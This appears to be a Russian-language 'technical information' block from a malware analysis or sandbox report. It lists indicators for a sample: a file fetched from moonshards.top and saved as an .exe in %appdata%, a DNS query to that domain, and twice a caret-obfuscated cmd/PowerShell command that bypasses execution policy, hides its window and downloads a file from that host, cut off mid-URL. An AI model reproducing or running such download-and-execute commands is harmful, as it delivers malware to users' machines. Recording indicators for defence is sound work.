Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWErS^he^ll.^eXE -^exECu^T^io^n^pOLICy ^BYpA^Ss^ ^-n^oPRo^fi^lE -^WindOw^STYlE ^h^I^DD^En^ (ne^w-^o^bj^Ect^ Sys^teM.net.WEb^C^li^Ent).Do^wnLO^a^dFIl^e(^'http://moonshards....
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /c "poWErS^he^ll.^eXE -^exECu^T^io^n^pOLICy ^BYpA^Ss^ ^-n^oPRo^fi^lE -^WindOw^STYlE ^h^I^DD^En^ (ne^w-^o^bj^Ect^ Sys^teM.net.WEb^C^li^Ent).Do^wnLO^a^dFIl^e(^'http://moonshards....' (со скрытым окном)